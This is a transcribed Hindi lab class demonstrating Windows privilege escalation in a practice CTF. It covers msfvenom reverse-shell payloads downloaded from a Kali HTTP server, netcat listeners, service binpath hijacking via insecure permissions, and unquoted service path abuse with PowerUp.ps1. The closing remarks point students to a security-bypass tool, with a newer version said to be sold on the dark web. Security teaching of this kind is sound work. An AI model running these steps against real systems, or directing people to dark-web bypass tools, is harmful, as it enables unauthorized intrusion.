अभी नहीं आएगा सर, कोई 1 घंटा हो गया, 1 घंटा बचा है। ठीक है तो स्टार्ट करते हैं ना। शैलेंद्र को करता हूँ कॉल सर। कर लो एक बार। 1 मिनट। करें स्टार्ट। हाँ सर करवा रहा है बस वो 1 मिनट। आ गया। हेलो शैलेंद्र। यस हेलो। सर। लैब सेटअप हो गई थी आपकी? नहीं सर। क्यों? सर मैं अभी बिजी चल रहा था पिछले 1 वीक से। अच्छा चलो ठीक है। लैब सेटअप कर लेना आज है ना। रिकॉर्डिंग मैंने अपलोड कर रखी है, प्रीवियस रिकॉर्डिंग देख के। ठीक है। ठीक है। हाँ स्टार्ट करते हैं अपन, है ना। तो विंडोज़ प्रीवियस, ठीक है। अपन यारी लैब सॉल्व करेंगे, CTF। ठीक है। तो आगे बढ़ चलते हैं, ठीक है। मशीन अपन ने बना ली खुद की, ठीक है। ओके। ऑन काली जनरेटेड रिवर्स शेल एग्जीक्यूटेबल रिवर्स डॉट exe यूजिंग MSF एन अपडेट द एलाउस्ट IP एड्रेस। ठीक है। ये बोल रहा है कि है ना, एक शेल जनरेट करो, ठीक है। और उसका शेल लो, किसका? नॉर्मल यूज़र का, ठीक है। ओके। तो मैं शायद एडमिन से लॉगिन हूँ, यूज़र्स लॉगिन होता हूँ। उसका पासवर्ड क्या था? पासवर्ड 321। 3, 2, 1। ठीक है, हो सकता है ये एडमिन का पासवर्ड मांगे, नहीं आ रहा। ठीक है। आई होप इसके जो डिफेंडर है वो ऑफ होने चाहिए ना, वरना ये शेल डाउनलोड नहीं करने देगा। ठीक है। विंडोज़, क्या हो रहा है भाई? अच्छा।
ठीक है, इसके ऑफ है ना? अच्छा, बताओ कैसे जनरेट करना है मेरे को वो पेलोड? कैसे शेल लूँगा मैं, बताओ। ओके, बताओ। एक शेल रख लेता हूँ, एक टर्मिनल रखता हूँ आईपी के लिए, ठीक है। ये मेरा यूज़र शेल रहेगा, ठीक है। इस पे मैं एडमिन शेल का एक्सेस लूँगा, एडमिन शेल, ठीक है। इसमें क्या करूँगा, मैंने रिवर्स शेल जनरेट करूँगा, ठीक है। रिवर्स जैन के, और ये मेरा सर्वर रहेगा, ठीक है। पाइथन सर्वर, ठीक है, बताओ। मेरे को विंडोज़ का एक्सेस लेना है, शेल लेना है, बताओ कैसे लूँगा। हेलो, हेलो, मेरी वॉइस नहीं आ रही क्या? यस सर आ रही है। फ़ोन से कौन कौन क्लास ज्वाइन कर रहा है? हेलो, सर लैपटॉप से ले रहे हैं। ठीक है। रिवर्सल कैसे जनरेट करना है मेरे को, ये बताओ। सर एमएसएफ वेनम से। ठीक है, बताओ कमांड। ठीक है, मेरे को ना उससे वो लेना है, एक रिवर्स शेल, ठीक है। तो मैं एक पेलोड जनरेट करता हूँ, ठीक है, एम एस ए एन एम के थ्रू, रिवर्स शेल का। एल होस्ट, आई थिंक यही होगी मेरी आईपी, 9128, ठीक है, 9128। एल पोर्ट मैंने 444 दिया है, ठीक है। फाइल टाइप ई दी है, और आउटपुट में जाता हूँ REV.exe में है स्टोर्ड हो, ठीक है। ठीक है, रिवर्सल जनरेट हो चुका है। अब बताओ मेरे को उसमें कैसे ट्रांसफ़र करना है विंडोज़ में इसको। फाइल ट्रांसफ़र बताया था ना तुम्हारे को। सर इसका आईपी पेस्ट कर दो उसके ब्राउजर। अच्छा, ठीक है। और दूसरा तरीका? सर डब्लू गेट से भी हो जाएगी। ठीक है, ठीक है, तो मैं ट्रांसफ़र करता हूँ फाइल को, ठीक है। तो उसके लिए मैं पाइथन का सर्वर स्टार्ट कर लेता हूँ, ठीक है।
जाता हूँ विंडोज़ पे, कमांड प्रॉम्प्ट ठीक है, पासवर्ड 1 2 3 ठीक है। अब कल से मैं इसको ले आता हूँ, ठीक है, HTTP, ठीक है। मेरी IP क्या थी, 192.168.9.128, ठीक है। पोर्ट नंबर दूंगा 8080 पे, मैंने सर्वर ऑन कर रखा है मेरा, और rev.exe, ठीक है। सर बगैर सर्वर ऑन करे भी तो कर ले सकते हैं हम या नहीं? क्या? विदाउट सर्वर ऑन, वहां हमने सर्वर चला रखा है ना HTTP का, हम्म। उसके बिना नहीं ले सकते हैं हम इस फाइल को? नहीं, बिना सर्वर के कैसे ट्रांसफ़र करोगे? अच्छा। है ना। और आउटपुट मेरे को चाहिए rev.exe में, ठीक है। अगर तुम ब्राउज़र से भी लेते तब भी सर्वर ऑन करना पड़ता, ठीक है। यही लिंक मैं अगर ब्राउज़र पर डाल ठीक है दूँ, सर। यही लिंक मैं अगर ब्राउज़र पर डाल दूँगा तो वो लिस्ट करने लग जाएगा, ठीक है। फिर मैं वहाँ से क्लिक करके डाउनलोड कर सकता हूँ, मैं डायरेक्ट शेल में भी डाउनलोड कर सकता हूँ, ठीक है। यस सर। हाँ, तो आउटपुट चाहिए मेरे को rev.exe में, ठीक है। एंटर करता हूँ और फाइल कॉपी हो चुकी है, ठीक है। dir करता हूँ। अरे यार, इतनी सारी चीज़ें पड़ी क्या इसमें? एक सेकंड रुक जाओ, इसको कट करने दो, नॉर्मल CMD खोलने दो, ठीक है। हाँ, dir, ठीक है, ये सही है, ठीक है। कल http://192.168.9.128:8080, ठीक है। rev.exe -o rev.exe कॉपी एयर करता हूँ, ठीक है। rev.exe हो गया, ठीक है। मैं लिसनर स्टार्ट कर लेता हूँ यहाँ पे यूज़र शेल में, ठीक है। rl rep 4040 पे, ठीक है, 4444 पे, ओके। और एग्जीक्यूट कराता हूँ इसको rev, ठीक है। शेल आ गया होगा हमारे पास, ठीक है, शेल आ गया। डन, सबको समझ में आया? यस सर। ठीक है, अब आगे चलते हैं। ट्रांसफर द रिवर्स फाइल, ठीक है, इस डायरेक्टरी में देना अपन ने कर लिया है, ठीक है। ऑन काली इन द सेम डायरेक्टरी एज ए reverse.exe, ठीक है। जनरेट का ये अलग कर लिया अपन ने। सर्विस एक्सप्लोइट, इनसिक्योर सर्विस परमिशन, क्या होती है ये इनसिक्योर सर्विस परमिशन? गाइस, इनसिक्योर सर्विस परमिशंस, मतलब सर जिन फाइल्स पे सिक्योर परमिशन नहीं होती, जो मतलब ऐसे यूजर से अनऑथराइज एक्सेस से आई होती है। हाँ, ठीक है। तो है ना, ये बोल रहा है कि यूज़ accesscheck.exe टू चेक द यूज़र अकाउंट परमिशन ऑन दी DSCLSVC, कोई एक सर्विस है ये, ठीक है। ये सर्विस है एक, ठीक है। इस पे क्या है, इनसिक्योर परमिशन है सर्विस की, इस सर्विस को इनसिक्योर परमिशन है, ठीक है। ये accesscheck.exe ये क्या होता है?
सिस इंटरनल का नाम सुना है? फोरेंसिक करी हो तो, जब तुम फोरेंसिक करोगे विंडोज़ पे, ठीक है, तो ये इंस्टॉल कराया जाएगा तुम्हारे को। तो इसके अंदर क्या है, अलग अलग माइक्रोसॉफ्ट की यूटिलिटी सॉफ्टवेयर है, ठीक है। एक्सेस चेक क्या करता है, ये है ना फाइल्स की सर्विस की परमिशन बताता है, ठीक है, कि उनको रीड राइट की परमिशन है नहीं है, ठीक है। जैसे अपन लिनक्स के अंदर ls-la करते थे, है ना, तो जैसे अपन ls-la करते थे लिनक्स में, तो बता देता था कि परमिशन रीड राइट की, एग्जीक्यूट की, ठीक है। पर विंडोज़ के केस में अलग है। विंडोज़ के केस में एक्सेस चेक इस टूल के थ्रू अपन क्या कर सकते हैं, फाइल को ना फाइल की परमिशन देख सकते हैं, ठीक है, चेक कर सकते हैं कि उसको रीड राइट की परमिशन है या नहीं है, ठीक है। तो इसको इंस्टॉल कर लेना, ठीक है। इसको यहाँ इंस्टॉल नहीं करूँगा, कॉपी करता हूँ। ठीक है, डाउनलोड कर लेता हूँ इसको। ये लैब सेटअप कर लेना, ठीक है, कुछ ना कुछ डाउनलोड होता रहेगा, ठीक है। ये डाउनलोड्स में पड़ी है, तो इसको क्या करता हूँ अब, एक काम करता हूँ, cd ठीक है, इसको ज़िप कर लेता हूँ। ओके, तो अनजिप, ठीक है, ये हो गई, ठीक है। तो इसमें अलग अलग सिस्टम आर्किटेक्चर के लिए अलग अलग सॉफ्टवेयर पड़े हैं, ठीक है। एक यूज़ ना हो तो तुम दूसरा यूज़ करके देख सकते हो, ठीक है। अब मैं क्या करता हूँ, इस वाले को ना वहाँ पे ट्रांसफ़र कर लेता हूँ जहाँ पे अपनी वो है विंडोज, इस बात पे, ठीक है। तो ऐसे करते हैं, कॉपी करता हूँ, और ठीक है, cd ठीक है, cp, ठीक है, और काली डाउनलोड्स के अंदर एक एक्सेस चेक .exe ये फाइल पड़ी है, ठीक है। कॉपी कर दो इसको और ले आओ, ठीक है। ठीक है, एक्सेस चेक .exe आ गई। इसको क्या करना है, ट्रांसफ़र करना है इस शेल पे। अब बताओ, सिंपल वही तरीका, कल http एट समझ में आ रहा है सबको मैं क्या कर रहा हूँ? एक्सेस चेक वाली फाइल को अपनी विंडोज़ मशीन पे लेके जा रहा हूँ, ठीक है। उसको एक्सट्रैक्ट करके कॉपी dir करता हूँ, लिस्टिंग access check.exe आ गया, ठीक है। अब ये कई केस में रन करता है, कई नहीं करता, ठीक
ठीक है, तो अपन इसको चेक कर लेते हैं। ठीक है, तो ये रन कर रहा है, तो आगे बढ़ते हैं। exec.exe अपना सेटअप हो गया। अब आगे बढ़ते हैं। एक्सेप्ट यूला, ये कमांड क्या काम करती है? एक्सेप्ट यूला क्या होता है ये? आइडिया है किसी को कुछ? हेलो, हेलो, नहीं मालूम सर। समझ में आ रहा है ना? अभी तक तो मैंने कुछ स्टार्ट नहीं किया, बस एक सॉफ्टवेयर डाउनलोड करा था, है ना, उसको ट्रांसफ़र कराया था एक्सेस। इसके थ्रू अपन फाइल्स की परमिशन देखेंगे, है ना, कि उस फाइल्स को या उस सर्विस को रीड एंड राइट की परमिशन है या नहीं। ठीक है, ठीक है। एक्सेस वो हो गया। एक्सेप्ट यूला ये काम करता है, जो आप तब क्या कहते हैं, जब आप सॉफ्टवेयर इंस्टॉल करते हो अपने विंडोज़ मशीन पे, ठीक है, तो एक ऑप्शन आता है इंस्टॉलेशन से पहले, एंटर लाइसेंस, है ना, एग्रीमेंट का। ठीक है, तो ये कमांड वो करती है, ठीक है, क्योंकि आप हो CLI बेस्ड, GUI बेस्ड तो हो नहीं। ठीक है, तो उसको करती है UWCQB। ठीक है, ये आप चेक कर सकते हो आप इसकी एक्सेस चेक की हेल्प। ठीक है, यू, ठीक है, एरर्स के लिए। ठीक है, W, शो ओनली ऑब्जेक्ट्स दैट हैव राइट एक्सेस। ठीक है, जो भी राइट एक्सेस है वो। ठीक है, और C, ठीक है, नेम दे दिया उसका, नेम इज़ विंडो सर्विस। ठीक है, और क्या था, Q था। ठीक है, इसमें Q शो नहीं कर रहा है। ठीक है, Q शायद तक ये क्वेरी के लिए है। ठीक है, और V वर्बोस के लिए। ठीक है, हाँ, Q क्वेरी के लिए और V वर्बोस के लिए। ठीक है, यूज़र, और यूज़र का नाम दे दिया। ठीक है, कौन सी सर्विस थी इसका। ठीक है, तो इसको रन करते हैं। ठीक है, और देखते हैं परमिशंस। ठीक है, और यूज़र, पहले यूज़र देखते हैं कि कौन कौन से यूज़र है। ठीक है, कॉपी करते हैं एंड पेस्ट। रन नहीं कर रहा है कि ये काम करता हूँ। एक्सेप्ट यूला, ओके, ठीक है, तो ये बता रहा है कि कौन कौन सी सर्विसेज है। ठीक है, कौन कौन से यूज़र्स है, कौन कौन सी सर्विसेज है, उनके बारे में इंफॉर्मेशन दे रही है। ठीक है, ये आपके अलग अलग है। ठीक है, सबके बारे में। तो इसमें एक सर्विस पड़ी है। ठीक है, बहुत लंबी लिस्ट है, तो इसमें एक सर्विस पड़ी है इस नाम की। ठीक है, जिसको क्या है, इनसिक्योर परमिशन है, जो कि नहीं होनी चाहिए थी। ठीक है, तो वो कह रहा है कि भाई इस यूज़र की ना परमिशन चेक करो कि ये रीड राइट की है ना परमिशन है ही नहीं है। ठीक है, तो अपन इसको कॉपी कर लेते हैं और ठीक है, तो उसको क्या है, एक एंटी अथॉरिटी सिस्टम की एक परमिशन है रीड राइट की। ठीक है, एक बिल्ट इन एडमिनिस्ट्रेटर। ठीक है, ये आपका बिल्ट इन एडमिनिस्ट्रेटर अकाउंट है, और एक एवरीवन रीड राइट। इसको कोई भी एवरीवन कोई भी है ना, इसको रीड राइट कर सकता है। ठीक है,
तो आगे बोलते हैं नोट दैट द यूज़र अकाउंट हैज़ द परमिशन टू चेंज टू सर्विस कॉन्फ़िग, ठीक है, क्वेरी द सर्विस एंड नोट दैट इज़ रन विथ सिस्टम प्रिविलेजेस, ठीक है, सर्विस क्वेरी, और ये बता रहा है कि भाई परमिशन चेक करो उसकी, ठीक है। कॉपी करता हूँ इसे एंड पेस्ट इट, एंटर, ठीक है। ये आपके टाइप बता रहा है, ठीक है, Win32 ऑन प्रोसेस, स्टेट टाइप, ठीक है, स्टार्ट टाइप बता रहा है डिमांड स्टार्ट का मतलब इसे कोई भी स्टार्ट कर सकता है, ठीक है। और ये बाइनरी पाथ इसका, ठीक है, ठीक है। इस बाइनरी पाथ में ये जो एक सर्विस पड़ी है, इस सर्विस को क्या है, एक इनसिक्योर परमिशन है, ठीक है, रीड राइट की। तो अपन को क्या करना है, modify द सर्विस कॉन्फ़िग एंड सेट द बाइनरी पाथ नेम टू रिवर्स एग्जीक्यूटिबल यू क्रिएटेड, ठीक है। अपन को एक रिवर्स शेल क्रिएट करना है, और ये जो service.exe रखी हुई है ना, इस सर्विस की जगह अपन को क्या करना है, एक रिवर्स शेल रख देना है, और ठीक है, और इसको रन करा देना है, ठीक है। तो चलो करते हैं। तो ये आपकी बाइनरी पाथ सेट करने की है, ठीक है। तो एक अपना पाथ क्रिएट करते हैं अपन। पाथ क्रिएट करने से पहले रिवर्स शेल जनरेट कर लेते हैं, ठीक है। एक मैं रिवर्स शेल बना रहा हूँ REV1 नाम से, ठीक है, और पोर्ट चेंज कर रहा हूँ, ठीक है। पोर्ट मैंने कर दिया इस बार 5555, ठीक है। एक रिवर्स शेल जनरेट कर लेता हूँ, और उसको क्या करता हूँ, पेस्ट कर लेता हूँ इसको यहाँ पे, अपनी फाइल भी लेता हूँ, कल HTTP ठीक है। RE1.txt आ गया, ठीक है। अब अपना बाइनरी पाथ सेट करते हैं अपन, ठीक है। तो उस कमांड को पेस्ट करता हूँ, ठीक है। तो अपन है इस बात में, इस बात को भी उठा के लेता हूँ, ठीक है। और REV1.exe, ठीक है। डन, सबको समझ में आ रहा है। मैंने पाथ चेंज कर दिया मेरी डायरेक्टरी का, ठीक है। मेरी डायरेक्टरी का मैंने पाथ रख दिया है, Ctrl+C करता हूँ और इसको पेस्ट करता हूँ, ठीक है। ठीक है, चेंज सर्विस कॉन्फ़िग सक्सेस, ठीक है। अब मैं वापस वही कमांड चलाऊंगा। तो यहाँ पे देख रहे हो मैंने पाथ चेंज कर दिया इसका, बाइनरी पाथ, ठीक है। तो अब मैं क्या करूँगा, एक लिस्टनर स्टार्ट करूँगा अपने एडमिन शेल पे, RL rep, ठीक है। और मैंने पोर्ट नंबर क्या दिया था उस वाले रिवर्स शेल को, पेलोड को 5555, 555 ठीक है, 5555 दिया था। तो मैं इसका शेल अपलोड कर लेता हूँ, और एक नेट स्टार्ट, एक ये ना ये है नेट कमांड है जो बताया था तुम्हारे को अलग अलग, इसमें वो स्टार्ट तुम्हारे को हेल्प चेक कराई थी जब, इसमें अलग अलग कमांड्स होती है, ठीक है। तो ये सर्विस को स्टार्ट कर रहा है, नेट स्टार्ट और वो सर्विस का नाम, ठीक है। कॉपी करता हूँ इसको और अपने यूजर सर्विस को पेस्ट करता हूँ, ठीक है, ठीक है। ये स्टक हो चुका है, इसका मतलब एडमिन शेल हमारे पास आ चुका है, ठीक है। वो एम आई, तो मैं एक एंटी अथॉरिटी सिस्टम, ठीक है, एक एडमिनिस्ट्रेटर हूँ, ठीक है। अगर मैं इसकी वो प्रिविलेज चेक करूँ तो ठीक है, मेरे पास हाई प्रिविलेज है। समझ में आया सबको?
हेलो हेलो सुजल समझ में आया? ओके। अंकित, शैलेंद्र, विशेष, अक्ष। क्या सर? ठीक है ना? आगे चलते हैं। तो ये था आपके इनसिक्योर सर्विस परमिशन। अब अनकोटेड सर्विस पाथ, ये क्या होता है अनकोटेड सर्विस पाथ? किसको आइडिया अनकोटेड सर्विस पाथ? ठीक है तो मैं बताता हूँ अनकोटेड सर्विस पाथ ये कर रहा है, ठीक है, सिस्टम की वेरी, ठीक है, और अनकोडेड पाथ कॉपी करता हूँ इसे और इसको एग्जिट कर देता हूँ, ठीक है, और पेस्ट करता हूँ इसे यहाँ पे। ठीक है, ये इसका बाइनरी बात है, ठीक है, वही डिमांड स्टार्ट इसका बाइनरी बात है, इसको उठा लेता हूँ। अब तो मैं समझाता हूँ अनकोडेड पाथ, इसका टेक्स्ट एडिटर कहाँ गया, ये रहा। ठीक है, तो हमारी एक ये फाइल है, ठीक है, जिसको ये फाइंड कर रहा है। तो ये पता तुम्हें कैसे फाइंड कर रहा है? ये सबसे पहले जाएगा प्रोग्राम फाइल्स में, ठीक है, फिर जाएगा अनकोटेड सर्विस पाथ में, ठीक है, फिर जाएगा कॉमन फाइल्स में, ठीक है, और फिर ये ढूंढेगा सर्विस को, ठीक है, ये 1 बाय 1 उसमें जाएगा, ठीक है, अलग अलग उस डायरेक्टरी में। अगर कोटेड होता, मतलब कोड लगा होता, तो ये एक एक करके नहीं ढूंढता, है ना, एक एक करके इसको ना डायरेक्टरी में जाने की जरूरत नहीं थी। ये क्या करता, एक साथ कोटेड के अंदर होता तो डायरेक्ट इसी डायरेक्टरी में जाता सीधे और उसको फाइंड करता, ठीक है। तो एक अनकोटेड पाथ सेट है, ठीक है, तो उसके थ्रू अपन कैसे कर सकते हैं, तो इसको तुम फाइंड कैसे करोगे अनकोटेड पाथ को, ठीक है। तो एक सॉफ्टवेयर आता है, मतलब एक इसकी पावर शेल की एक यूटिलिटी है, ठीक है, उसका नाम है पावर अप डॉट पी एस वन गिटअप, ठीक है। ये ठीक है, तो तुम उसको डाउनलोड कर सकते हो, चेक कर सकते हो। डेंजरस डाउनलोड ब्लॉक्ड, ठीक है, डाउनलोड हो गया। अब इसको क्या करता हूँ मैं, अपने यूज़र शेल पे ले आता हूँ, ठीक है। पहले क्या करता हूँ, सी पी, ठीक है, इसको यूज़र शेल पे कैसे लेके जाऊँगा, सेम वही कल यूज़ करके, ठीक है।
और इसका नेम, ठीक है। तो हाइफन ओ और सिंगल मैसेज यूआरएल, ओके। ठीक है, तो ये आ गया, ठीक है। अब इसको कैसे रन करेंगे हम? कमांड आती है इंपोर्ट मॉड्यूल, ठीक है। और ठीक है, ठीक है, ये रन नहीं कर रहा है। ये इम्पोर्ट नहीं लिखा आपने। ये तो अभी भी रन नहीं कर रहा है। ठीक है, कोई बात नहीं, ठीक है। हाँ, सबसे पहले इसको मैं क्या करता हूँ, एक बार इसको वो आ गया ना dir दिस पीसी यूजर्स यूज़र और ये, ठीक है। इसको ओपन फिट करता हूँ नोटपैड के अंदर, ठीक है। तुम्हारे एक कमांड होती है इसके अंदर, ठीक है। एक फंक्शन है, कमांड नहीं बोलूँगा, एक फंक्शन है, ठीक है, अनकोटेड सर्विस के नाम से। तो कंट्रोल F करता हूँ और ओके, अनकोटेड सब कुछ है क्या इसमें? ओके, गेट ठीक है, ये रहा फंक्शन है एक, गेट अनकोटेड सर्विस, ठीक है। ये क्या करके देगा, उस पाथ को, अनकोटेड पाथ को लाके देगा, ठीक है। ये सर, ये फंक्शन क्या यूज़ कर रहा है, ठीक है। ये फंक्शनैलिटी हमारे को वो लाके देगी अनकोटेड पाथ, ठीक है। तो इसको कैसे रन करना है, टर्मिनल पे जाओगे, ठीक है। पावर शेल में कन्वर्ट करोगे इसको, पावर शेल .exe, ठीक है। और पावर शेल -EP बाईपास, ठीक है। ये कमांड तुम बाईपास कुछ ही नहीं कर रहे हो उसमें, बस तुम एक उसको बता रहे हो कि मैं ये रन करना चाहता हूँ, ठीक है। मैं इसको रन करूँगा, ठीक है। तो ये रन चाहिए मुझे, ठीक है। इसमें बाईपास नहीं कह सकते इसको अपन, ठीक है। और फिर मैं इसको रन करता हूँ, ठीक है। तो ये रन हो गया। अब मैं उस फंक्शनलिटी को रन करता हूँ, ठीक है। फंक्शन का क्या है, इस फंक्शन को कॉपी करता हूँ एंड पेस्ट, पेस्ट नहीं हो रहा है, ठीक है, कोई बात नहीं। नोटपैड, ठीक है। और मशीन, विंडोज़ मशीन पे जाता हूँ,
ठीक है, कॉपी करता हूँ इसे, पेस्ट करता हूँ और देखता हूँ ये रन करता है नहीं करता। ठीक है, ये रन नहीं कर रहा है। कहाँ गलती हुई हमारे से? गेट हाइफन अनकोटेड, यूएन, ओके ठीक है, अब रन करता हूँ। अभी भी रन नहीं कर रहे तो वही वाला हुआ है क्या? सही है अब तो। बताओ, एक काम करता हूँ मैं, अब इसको रन करके देखता हूँ। इंपोर्ट हाइफन मॉड्यूल, पावर अप, ओके PS1, कॉपी पेस्ट इट। ठीक है, इंपोर्ट हो गया है मॉड्यूल। अब रन करके देखता हूँ रन हो जाए। ठीक है, तो ये रन हो गया। समझ में आया सबको? ठीक है, आगे चले। समझ में आया सबको? ये दिमाग के ऊपर से जा रही है। हेलो अक्ष, सब वही है गुरु। क्या? आ रहा है सर सर सर। ठीक है, ठीक है, तो आगे बढ़ते हैं। यूजिंग एक्सेस चेक डॉट एक्सी नोट द बिल्ट इन यूजर ग्रुप इन अलाउड राइट टू दी, एक सेकेंड। ओके, सर बात में तो पूछ लो। सबको समझ में आ रहा है? आज ज़्यादा नहीं कराऊंगा, सिर्फ लास्ट है। ठीक है, फिर कल में हो जाएगा आई थिंक ये पूरा। ठीक है, कल बाकी छोटे छोटे ज़्यादा बड़े नहीं हैं, ये दो ही बड़े हैं स्टार्टिंग के। ठीक है, इन दो को तुम करना है ना प्रैक्टिकल। तुम्हारी जब तक लैब भी सेट हो जाएगी है ना, लैब भी सेट हो जाएगी प्रॉपर और तुम्हारे को समझ में आ जाएगा। ठीक है, इन दो से ही आगे तुम, फिर तुम्हारे को समझने में दिक्कत नहीं होगी। ठीक है, अपन कैसे क्या करेंगे, तो आज दो ही कराऊंगा तुम्हारे को ये। ठीक है, अनकोडेड सर्विस पाथ। ठीक है, तो फाइंड करते हैं। ठीक है, एक्सेस चेक के थ्रू एक्सेप्ट यूला हाइफन यू और ये अनकोडेड पाथ सर्विस। ठीक है, अब चलते हैं अपनी मशीन पे और इसको मैं एग्जिट आता हूँ और dir करता हूँ और एक्सेस चेक उठाता हूँ। ठीक है, कॉपी पेस्ट। ठीक है, और पेस्ट कर लिया। ठीक है, और पाथ क्या था अपना? ये पाथ था। ठीक है, ऐसे कॉपी कर लेता हूँ, पेस्ट कर लेता हूँ। हमें ये बताएगा कि हमें इस पाथ पे है ना रीड राइट की परमिशन है नहीं है। ठीक है, ठीक है, इस पर नहीं है तो इसे करता हूँ
कॉमन पाथ्स पे चेक करता हूँ, ठीक है। तो इस पे है कॉमन फाइल्स के अंदर जाके, ठीक है, रीड राइट एंटी सर्विस ट्रस्ट इंस्टॉलर सिस्टम बिल्ट इन इंस्पेक्टर अथॉरिटी, ठीक है, रीड राइट की, पर मुझे नहीं है शायद तक। तो एक काम करता हूँ, एक पाथ और पीछे आता हूँ, ठीक है, रीड राइट बिल्ट इन यूज़र, ठीक है, एक मैं बिल्ट इन यूज़र हूँ, ठीक है। मतलब इस बिल्ट इन यूज़र के अंदर मतलब जो भी यूज़र है उन सबको क्या है, रीड राइट की परमिशन है। अब तुम कैसे पता लगेगा कि तुम बिल्ट इन यूज़र हो या नहीं है? मैंने तुम्हें बताई थी नेट यूज़र यूज़र, ठीक है। तो ये देखो मैं क्या हूँ, एक यूज़र्स ग्रुप का क्या हूँ, लोकल ग्रुप मेंबरशिप, ठीक है। तो मुझे क्या है, परमिशन है, ठीक है, इसलिए समझ में आया। तो मैं क्या कर सकता हूँ, रीड राइट कर सकता हूँ इस पाथ के अंदर रह के, ठीक है। तो आगे चलते हैं, फिर बोलता है कॉपी करो रिवर्स शेल को, ठीक है, यहाँ पे एक इस पाथ के अंदर एक कॉमन डॉट EXE के नाम से, ठीक है। तो मुझे एक रिवर्स शेल बनाना पड़ेगा, ठीक है। तो एक काम करता हूँ, एक रिवर्स शेल बनाता हूँ और REV2 ठीक है, रिवर्स शेल जनरेट हो गया, ठीक है। REV2.exe REV2.exe ठीक है, कॉपी कर लेता हूँ यार, ठीक है। अब वो बोल रहा है कि कॉपी करो उसको, तो कॉपी और पाथ, ठीक है, मैं करता हूँ कॉपी। मैं डायरेक्ट उसी पाथ के अंदर हूँ तो मुझे स्पेसिफिक पाथ देने की जरूरत नहीं है, मैं REV2 करता हूँ डायरेक्ट .exe, और किस पाथ में बोल रहा है कि ये इस पाथ के अंदर सेट कर दो और कॉमन .exe, ठीक है, उसको इस नाम से, ठीक है। मैं उठा लेता हूँ उसको और कॉपी कर लेता हूँ, ठीक है, डन, 1 फाइल्स कॉपीड, ठीक है। अब ये बोल रहा है कि नेट स्टार्ट, ओके, इस सर्विस को स्टार्ट करो, ठीक है। तो इसको स्टार्ट करने से पहले मैं रिवर्सल जनरेट कर लेता हूँ। किस पोर्ट पे बनाया था मैंने, 666 पे बनाया था, ठीक है। तो मैं 666 पे स्टार्ट कर लूँगा इसे, और उसको क्या करता हूँ, स्टार्ट करता हूँ, कॉपी करता हूँ इसे और यूज़र शेल एंड पेस्ट, ठीक है। स्टक हो चुका, तो कि हमारे पास एडमिन शेल आ गया होगा, ठीक है, वो है माई, ठीक है। तो एक मैं एंटी अथॉरिटी सिस्टम हूँ, एक एडमिन यूज़र हूँ, ठीक है, /brief, ठीक है। तो मैंने क्या करा, एक फाइंड करा उसके थ्रू, और मैंने पता करा कि भाई कौन से पाथ पे मेरे को रीड राइट की एग्जीक्यूटिव परमिशन है, वहीं जिस पाथ पे मुझे मिली उसी पाथ पे मैंने एक रिवर्स शेल का पेलोड जनरेट करके और उसका एडमिनिस्ट्रेटर अकाउंट एक्सेस ले लिया, शेल ले लिया, ठीक है। समझ में आया सबको? गाइस, सबको समझ में आया? किसी कोई डाउट? अब इससे आगे जाओगे तो सर कुछ नहीं समझ में आएगा। नहीं नहीं, आज के लिए इतने बहुत है, क्योंकि टाइम भी नहीं है इतना, और तीसरी लैब हो भी नहीं पाएगी, है ना, तीसरा टास्क, और तुम्हारे को मुझे पता है समझ में भी नहीं आएगा, ये तो नहीं बोलना बस सर। है ना। तो बाकी सबको समझ में आया क्या? यहाँ तक समझ में आया? यहाँ तक पहले ट्राई करना, ठीक है। आज मैं रिकॉर्डिंग अभी अपलोड कर रहा हूँ, है ना। रिकॉर्डिंग देख के अपलोड सॉफ्टवेयर डाउनलोड करना, सेट करना और ट्राई करना, 2 लैब से सॉल्व करना, ठीक है। कोई भी रह रहा है तो हम कल सॉल्व करेंगे इसके अंदर, ठीक है। और मैं अटेंडेंस ले लेता हूँ। अंकित अक्ष, ठीक है, अनंत नहीं आया है, अंकित आया है, अक्षय आया है, बिट्टू आया है, गौरव नहीं आया, खुशी आई है, पवन प्रवीण नहीं आया, राम भी नहीं आया, शैलेंद्र आया, शेख अमन नहीं आया, सुजल आया था, सूरज आया था, विशेष आया था, ठीक है, डन है।
किसी का अटेंडेंस छूट रही है या फिर किसी की लग गई तो बता दो। करो करो। ठीक है, खुशी समझ में आया? हाँ सर, और करके देखेंगे, खुद से पता चलेगा। हाँ वो हाँ। तो इंटेलिजेंट है कर लीजिए। शैलेंद्र, समझ में आया? अंकित? समझ में तो आ गया, पर अब क्या बताऊँ आपको, बहुत ज्यादा थोड़ा सा बिजी चल रहा हूँ थोड़े टाइम से। इट्स टाइम ना ओके, मिल रहा है कुछ सुनने का। इट्स ओके, कोई बात नहीं। ठीक है, कोई भी हम्म। डाउट हो तो कल पूछ लेना। और सुजल, अंकित, विशेष। सर हाँ, वो जो आपने भेजा था ना वो 888 ट्रैक, वो HTTP एरर दे रहा, डाउनलोड नहीं हो रहा वो। उसको विनरार से डाउनलोड होएगा वो। कैसे? विनरार सॉफ्टवेयर आता है, हम्म, उससे डाउनलोड होएगा। ठीक है, इसको पहले डाउनलोड करना। ठीक है, इससे एक्सट्रैक्ट होएगा वो, और फिर वो पासवर्ड पासवर्ड मांगेगा। उसका पासवर्ड है 123। ठीक है। ठीक है। वर्क करेगा ना 13 तक वो? हाँ, 13 तक वर्क करेगा वो, बाईपास कर देगा वो सिक्योरिटी। ठीक है। ओके। है ना? और कोई डाउट है किसी को? सर 14 तक नहीं हो जाएगा कोई सा? 14 का है ना, इसका क्या कहते हैं, 14 का इसका प्रीमियम आता है, वो तुम्हारे को ऐसे नहीं पेड? मिलेगा, डार्क वेब पे मिलेगा। ठीक है, वो तुम्हें खरीदना पड़ेगा, पेड है सर वो। हाँ वो सर कर तो रहा था, कई सारे पेड भी दिए थे। पेमेंट वहाँ